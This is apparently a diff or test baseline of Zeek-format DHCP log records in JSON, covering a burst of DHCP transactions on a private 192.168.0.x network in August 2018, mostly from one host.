+{"ts":"2018-08-03T23:37:57.179761Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2085832578} +{"ts":"2018-08-03T23:37:58.429791Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":468632973} +{"ts":"2018-08-03T23:37:58.561279Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1957231652} +{"ts":"2018-08-03T23:38:00.188246Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2312403531} +{"ts":"2018-08-03T23:38:01.471975Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1629665705} +{"ts":"2018-08-03T23:38:01.532650Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2565341385} +{"ts":"2018-08-03T23:38:01.644015Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3689492358} +{"ts":"2018-08-03T23:38:02.037956Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3999733025} +{"ts":"2018-08-03T23:38:02.139241Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3334220373} +{"ts":"2018-08-03T23:38:02.263992Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":3932870976} +{"ts":"2018-08-03T23:38:02.220160Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":406412082} +{"ts":"2018-08-03T23:38:02.341633Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3390103199} +{"ts":"2018-08-03T23:38:02.447868Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":4084871715} +{"ts":"2018-08-03T23:38:02.473155Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":3493059279} +{"ts":"2018-08-03T23:38:02.978488Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2212020735} +{"ts":"2018-08-03T23:38:03.034028Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1984402243} +{"ts":"2018-08-03T23:38:03.135177Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1543642246} +{"ts":"2018-08-03T23:38:03.022217Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":1901579746} +{"ts":"2018-08-03T23:38:03.231320Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1004583860} +{"ts":"2018-08-03T23:38:03.241445Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":1848543734} +{"ts":"2018-08-03T23:38:03.275175Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":1672588751} +{"ts":"2018-08-03T23:38:03.604939Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3335064147} +{"ts":"2018-08-03T23:38:03.711052Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":251581673} +{"ts":"2018-08-03T23:38:03.718764Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":1560696338} +{"ts":"2018-08-03T23:38:04.504880Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":556526671} +{"ts":"2018-08-03T23:38:04.520086Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":3064707295} +{"ts":"2018-08-03T23:38:04.520086Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2647528193} +{"ts":"2018-08-03T23:38:04.520086Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":824887627} +{"ts":"2018-08-03T23:38:04.520086Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1276768643} +{"ts":"2018-08-03T23:38:04.523260Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":1870725832} +{"ts":"2018-08-03T23:38:04.520086Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":241357044} +{"ts":"2018-08-03T23:38:04.530184Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1764829999} +{"ts":"2018-08-03T23:38:04.530184Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2622212293} +{"ts":"2018-08-03T23:38:04.550380Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3189376034} +{"ts":"2018-08-03T23:38:04.550380Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":358931895} +{"ts":"2018-08-03T23:38:04.605963Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3842888187} +{"ts":"2018-08-03T23:38:04.605963Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1705283867} +{"ts":"2018-08-03T23:38:04.621148Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2510595915} +{"ts":"2018-08-03T23:38:04.621148Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3048568314} +{"ts":"2018-08-03T23:38:04.621148Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":4265872357} +{"ts":"2018-08-03T23:38:04.621148Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":699279507} +{"ts":"2018-08-03T23:38:04.636356Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":978025809} +{"ts":"2018-08-03T23:38:04.646515Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":1659735465} +{"ts":"2018-08-03T23:38:04.700367Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":3324165879} +{"ts":"2018-08-03T23:38:05.381435Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":1560696338} +{"ts":"2018-08-03T23:38:07.225451Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":2288132400} +{"ts":"2018-08-03T23:38:07.225451Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2457860932} +{"ts":"2018-08-03T23:38:07.250936Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1351685909} +{"ts":"2018-08-03T23:38:07.620228Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":4034891878} +{"ts":"2018-08-03T23:38:07.635464Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":2057115372} +{"ts":"2018-08-03T23:38:07.635464Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3341699293} +{"ts":"2018-08-03T23:38:08.105351Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2578410136} +{"ts":"2018-08-03T23:38:08.118501Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":3644070254} +{"ts":"2018-08-03T23:38:08.130551Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":298861117} +{"ts":"2018-08-03T23:38:08.146196Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":3790687138} +{"ts":"2018-08-03T23:38:08.146196Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":2916195605} +{"ts":"2018-08-03T23:38:08.171521Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":3157257848} +{"ts":"2018-08-03T23:38:08.181678Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3459559533} +{"ts":"2018-08-03T23:38:08.181678Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3530604751} +{"ts":"2018-08-03T23:38:08.419273Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1785579661} +{"ts":"2018-08-03T23:38:10.093185Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":2180782892} +{"ts":"2018-08-03T23:38:10.108362Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":4213546219} +{"ts":"2018-08-03T23:38:10.108362Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3415143718} +{"ts":"2018-08-03T23:38:10.108362Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2831889710} +{"ts":"2018-08-03T23:38:10.184291Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2039270016} +{"ts":"2018-08-03T23:38:10.194388Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":86400.0,"trans_id":207377218} +{"ts":"2018-08-03T23:38:10.213808Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":1560696338} +{"ts":"2018-08-03T23:38:10.240162Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":3926977028} +{"ts":"2018-08-03T23:38:10.638295Z","uid":"CQcGkX1PaSnGr3ORJ9","id.orig_h":"192.168.0.51","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b2:45","assigned_ip":"192.168.0.51","lease_time":86400.0,"trans_id":1560696338} +{"ts":"2018-08-03T23:38:10.735023Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":271716910} +{"ts":"2018-08-03T23:38:10.775513Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2797901233} +{"ts":"2018-08-03T23:38:10.775513Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1472453997} +{"ts":"2018-08-03T23:38:10.795726Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1680227924} +{"ts":"2018-08-03T23:38:10.795726Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1192941810} +{"ts":"2018-08-03T23:38:10.715180Z","uid":"CwfHTA3lTAgTgF3mhd","id.orig_h":"192.168.0.53","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"00:60:6e:00:9d:f9","assigned_ip":"192.168.0.53","lease_time":86400.0,"trans_id":799227746} +{"ts":"2018-08-03T23:38:10.906807Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":551330505} +{"ts":"2018-08-03T23:38:10.916903Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1964034945} +{"ts":"2018-08-03T23:38:10.927050Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":4106574409} +{"ts":"2018-08-03T23:38:10.942218Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":117913364} +{"ts":"2018-08-03T23:38:10.957428Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2497412807} +{"ts":"2018-08-03T23:38:10.957428Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":934706956} +{"ts":"2018-08-03T23:38:10.967557Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3681834380} +{"ts":"2018-08-03T23:38:10.982752Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":88267252} +{"ts":"2018-08-03T23:38:10.982752Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":821742303} +{"ts":"2018-08-03T23:38:10.992833Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":121652725} +{"ts":"2018-08-03T23:38:11.028290Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1302283127} +{"ts":"2018-08-03T23:38:11.038436Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3064388534} +{"ts":"2018-08-03T23:38:11.078952Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2338178733} +{"ts":"2018-08-03T23:38:11.139724Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":155255221} +{"ts":"2018-08-03T23:38:11.165040Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2639841505} +{"ts":"2018-08-03T23:38:11.180241Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1093023359} +{"ts":"2018-08-03T23:38:11.205747Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":975863765} +{"ts":"2018-08-03T23:38:11.231050Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":2745177714} +{"ts":"2018-08-03T23:38:11.238328Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":1441758} +{"ts":"2018-08-03T23:38:11.281687Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":3219982330} +{"ts":"2018-08-03T23:38:11.282637Z","uid":"ClPpoU1txFznvRQVOj","id.orig_h":"192.168.0.54","id.orig_p":68,"id.resp_h":"192.168.0.1","id.resp_p":67,"mac":"ec:f4:bb:4f:b0:96","assigned_ip":"192.168.0.54","lease_time":0.0,"trans_id":610324406} 